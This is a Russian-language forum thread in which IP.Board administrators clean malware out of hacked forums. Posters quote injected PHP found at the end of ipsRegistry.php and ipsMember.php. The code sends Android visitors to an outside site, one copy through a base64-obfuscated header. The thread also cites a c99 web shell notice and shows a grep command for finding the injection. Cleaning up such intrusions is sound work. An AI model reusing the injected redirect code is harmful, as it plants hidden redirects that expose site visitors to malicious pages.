Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
siv1987

Security update

Рекомендованные сообщения

Нашел ))

В файле admin/sources/base/ipsRegistry.php

 

нашел в самом низу и удалил код:

 

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

Поделиться сообщением


Ссылка на сообщение

Вот такие веселые коды прописались в ipsMember.php при удалении выскакивает ошибка форума ***/sources/base/ipsMember.php on line 3852, будем дальше искать

 

}

$mbrowser = function_exists("mobile_device_detect") ? mobile_device_detect() : false;

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header(base64_decode("TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s"));

exit;

}

 

и в ipsRegistry.php - этот код снес

 

}

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

 

 

Если расшифровать вот это через base64 декодер TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s

получаем - Location: http://www.kirkdavidson.com/js/fp.html

 

Вот так ))

Поделиться сообщением


Ссылка на сообщение

Зашел на один, а там:

Hackers had target адресфорума.net , They were using a 0-day exploit.

 

They were able to exploit the file public_html/hooks/boardIndexRecentTopics_540cbccd3003d5413b759ef888b45a23.php and replace it with a c99 shell.

 

Please do disable that plugin on all your IP.Boards.

 

:: Issued in public interest by ServerPolice Inc. htttp://serverpolice.org ::

 

 

PS : We'll be back soon ;)

 

Версия форум у них была, мне кажется, 3.4.2

Поделиться сообщением


Ссылка на сообщение

Друзья, подскажите как вычистить остальное )) из ipsMember.php не могу удалить выскакивает ошибка

Поделиться сообщением


Ссылка на сообщение

Какая ошибка?

В остальных файлов искали?

Шеллы удалили?

ssh на хостинге есть?

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
01/28/13 11:40 (изменено)

SSH есть. По поиску не искал, нашел только в соседнем файле sRegistry.php - и почистил вручную он там немного подругому был записал выше есть все коды которые там прописаны.

Как проверить на шеллы ? хочу поставить ХАнтера что то не ставится пока(

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Ранее был вирус тот что из 128 картинки все что мог вроде почистил.

Патчи безопасности стоят

Изменено пользователем Ultima

Поделиться сообщением


Ссылка на сообщение
SSH есть.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Что-то лишнее удалили. Файл прикрепите.

 

Патчи безопасности стоят

Кроме патчей, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до патча.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

 

Что-то лишнее удалили. Файл прикрепите.

 

 

Кроме патчи, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до их установке.

 

А как почистить изменения и левый файлы ?

Файлы не могу залить давай на почту скину ?

Использовано 0байт из разрешенных вам 50К для загрузки файлов (максимальный размер файла: 50К)

 

 

Вот вся папка https://www.dropbox.com/s/7f7er9o703gh5f3/base.rar

 

 

Пишет The -P option is not supported

Поделиться сообщением


Ссылка на сообщение
А как почистить изменения и левый файлы ?

Вручную, либо из бэкапа. Но если из бэкапа, прежде чем их заливать желательно проверить.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

ipsMember.php и ipsRegistry.php

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

ipsMember.php и ipsRegistry.php

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

 

Вручную, либо из бэкапа. Но если из бэкапа желательно прежде чем их заливать - проверить.

бэкапа к сожалению нет :) Если и есть то наверное старый.

Поделиться сообщением


Ссылка на сообщение

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Поделиться сообщением


Ссылка на сообщение

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Соверженно верно этот же код ?

Поделиться сообщением


Ссылка на сообщение

@Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...